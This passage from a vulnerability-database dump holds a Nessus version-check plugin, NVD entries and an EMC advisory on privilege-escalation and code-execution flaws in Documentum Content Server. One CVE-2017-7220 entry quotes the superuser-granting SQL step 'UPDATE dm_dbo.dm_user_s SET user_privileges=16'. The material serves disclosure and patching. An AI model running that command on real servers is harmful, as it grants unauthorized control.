"vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-01-18T14:37:25", "description": "The remote host is running a version of EMC Documentum Content Server that is affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists due to improper handling of system objects that allows a user to escalate their privileges to super-user status.\n (CVE-2014-4621)\n\n - A privilege escalation vulnerability exists due to improper handling of subgroups in the 'dm_superusers' group and other privileged groups. A user with sysadmin privileges can escalate their privileges to super-user status. (CVE-2014-4622)", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "EMC Documentum Content Server Multiple Privilege Escalation Vulnerabilities (ESA-2014-091)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4621", "CVE-2014-4622"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:emc:documentum_content_server"], "id": "EMC_DOCUMENTUM_CONTENT_SERVER_ESA-2014-091.NASL", "href": "https://www.tenable.com/plugins/nessus/77864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77864);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-4621\", \"CVE-2014-4622\");\n script_bugtraq_id(69817, 69819);\n\n script_name(english:\"EMC Documentum Content Server Multiple Privilege Escalation Vulnerabilities (ESA-2014-091)\");\n script_summary(english:\"Checks for Documentum Content Server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple privilege escalation\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of EMC Documentum Content Server\nthat is affected by multiple vulnerabilities :\n\n - A privilege escalation vulnerability exists due to\n improper handling of system objects that allows a user\n to escalate their privileges to super-user status.\n (CVE-2014-4621)\n\n - A privilege escalation vulnerability exists due to\n improper handling of subgroups in the 'dm_superusers'\n group and other privileged groups. A user with sysadmin\n privileges can escalate their privileges to super-user\n status. (CVE-2014-4622)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2014/Sep/att-92/ESA-2014-091.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:documentum_content_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_documentum_content_server_installed.nbin\");\n script_require_keys(\"installed_sw/EMC Documentum Content Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"emc_documentum.inc\");\n\napp_name = DOC_APP_NAME;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nfixes = make_nested_list(\n make_list(\"7.1P08\"),\n make_list(\"7.0P15\" + DOC_HOTFIX),\n make_list(\"6.7SP2P17\", DOC_NO_MIN)\n);\n\ndocumentum_check_and_report(install:install, fixes:fixes, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T02:39:02", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization and does not properly restrict object types, which allows remote authenticated users to run save RPC commands with super-user privileges, and consequently execute arbitrary code, via unspecified vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2514.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4532", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2514", "CVE-2015-4532"], "modified": "2016-11-28T19:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4532", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4532", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-user privileges via a custom script. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2513.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4533", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2015-4533"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4533", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization for subgroups of privileged groups, which allows remote authenticated sysadmins to gain super-user privileges, and bypass intended restrictions on data access and server actions, via unspecified vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-4622.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4531", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4622", "CVE-2015-4531"], "modified": "2016-11-28T19:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4531", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:07:36", "description": "EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization and does not properly restrict object types, which allows remote authenticated users to run save RPC commands with super-user privileges, and consequently execute arbitrary code, via unspecified vectors.", "cvss3": {}, "published": "2014-07-08T11:06:00", "type": "cve", "title": "CVE-2014-2514", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2514"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2014-2514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2514", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:07:36", "description": "EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-user privileges via a custom script.", "cvss3": {}, "published": "2014-07-08T11:06:00", "type": "cve", "title": "CVE-2014-2513", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2014-2513", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2513", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "Java Method Server (JMS) in EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 allows remote authenticated users to execute arbitrary code by forging a signature for a query string that lacks the method_verb parameter.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4534", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4534"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4534", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4534", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:10:52", "description": "EMC Documentum Content Server before 6.7 SP2 P17, 7.0 through P15, and 7.1 before P08 does not properly check authorization for subgroups of privileged groups, which allows remote authenticated sysadmins to gain super-user privileges, and bypass intended restrictions on data access and server actions, via unspecified vectors.", "cvss3": {}, "published": "2014-09-17T10:55:00", "type": "cve", "title": "CVE-2014-4622", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4622"], "modified": "2017-08-29T01:35:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.0", "cpe:/a:emc:documentum_content_server:6.6", "cpe:/a:emc:documentum_content_server:6.0", "cpe:/a:emc:documentum_content_server:6.5", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7"], "id": "CVE-2014-4622", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4622", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.5:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:sp3:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "Java Method Server (JMS) in EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02, when __debug_trace__ is configured, allows remote authenticated users to gain super-user privileges by leveraging the ability to read a log file containing a login ticket.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4535", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4535"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4535", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4535", "cvss": {"score": 7.5, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:01", "description": "EMC Documentum Content Server before 7.0 P20, 7.1 before P18, and 7.2 before P02, when RPC tracing is configured, stores certain obfuscated password data in a log file, which allows remote authenticated users to obtain sensitive information by reading this file.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4536", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4536"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:7.0", "cpe:/a:emc:documentum_content_server:7.2"], "id": "CVE-2015-4536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4536", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:13:12", "description": "OpenText Documentum Content Server allows superuser access via sys_obj_save or save of a crafted object, followed by an unauthorized \"UPDATE dm_dbo.dm_user_s SET user_privileges=16\" command, aka an \"RPC save-commands\" attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4532.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-21T02:59:00", "type": "cve", "title": "CVE-2017-7220", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4532", "CVE-2017-7220"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:opentext:documentum_content_server:-"], "id": "CVE-2017-7220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7220", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opentext:documentum_content_server:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:13:14", "description": "OpenText Documentum Content Server has an inadequate protection mechanism against SQL injection, which allows remote authenticated users to execute arbitrary code with super-user privileges by leveraging the availability of the dm_bp_transition docbase method with a user-created dm_procedure object, as demonstrated by use of a backspace character in an injected string. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2513.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-25T14:59:00", "type": "cve", "title": "CVE-2017-7221", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2017-7221"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/a:opentext:documentum_content_server:-"], "id": "CVE-2017-7221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7221", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:opentext:documentum_content_server:-:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n\r\n\r\nESA-2014-064.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities\r\n\r\nEMC Identifier: ESA-2014-064\r\n\r\nCVE Identifier: CVE-2014-2513, CVE-2014-2514\r\n\r\nSeverity Rating: CVSS v2 Base Score: Refer below for scores for each CVE. \r\n\r\nAffected products: \r\n\u2022\tAll EMC Documentum Content Server versions of 7.1\r\n\u2022\tAll EMC Documentum Content Server versions of 7.0\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP2\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP1\r\n\u2022\tAll EMC Documentum Content Server versions prior to 6.7 SP1\r\n\r\nSummary: \r\nEMC Documentum Content Server contains fixes for privilege escalation vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. \r\n\r\nDetails: \r\nEMC Documentum Content Server may be susceptible to the following privilege escalation vulnerabilities:\r\n\r\n\u2022\tCVE-2014-2513\r\nAuthenticated non-privileged users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This could be potentially exploited to perform unauthorized actions on Content Server.\r\no\tCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\n\u2022\tCVE-2014-2514\r\nAuthenticated non-privileged users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This could be potentially exploited by a malicious authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code.\r\no\tCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\nResolution: \r\nEMC recommends all customers upgrade to one of the versions listed below at the earliest opportunity. \r\n\u2022\tEMC Documentum Content Server version 7.1 P06 and later\r\n\u2022\tEMC Documentum Content Server version 7.0 P15 and later\r\n\u2022\tEMC Documentum Content Server version 6.7 SP2 P15 and later\r\n\u2022\tEMC Documentum Content Server version 6.7 SP1 P28 and later\r\n\r\nLink to remedies:\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\r\n\r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\nProduct Security Response Center\r\nsecurity_alert@emc.com\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlO64voACgkQtjd2rKp+ALyPuACgxtfoIFxBqHeyFVi0eNwQA428\r\nNaEAoKzmD8WcINVBGj/CYul8UON+Osyr\r\n=wzFw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-07-28T00:00:00", "type": "securityvulns", "title": "ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-2514", "CVE-2014-2513"], "modified": "2014-07-28T00:00:00", "id": "SECURITYVULNS:DOC:30958", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30958", "sourceData": "", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content 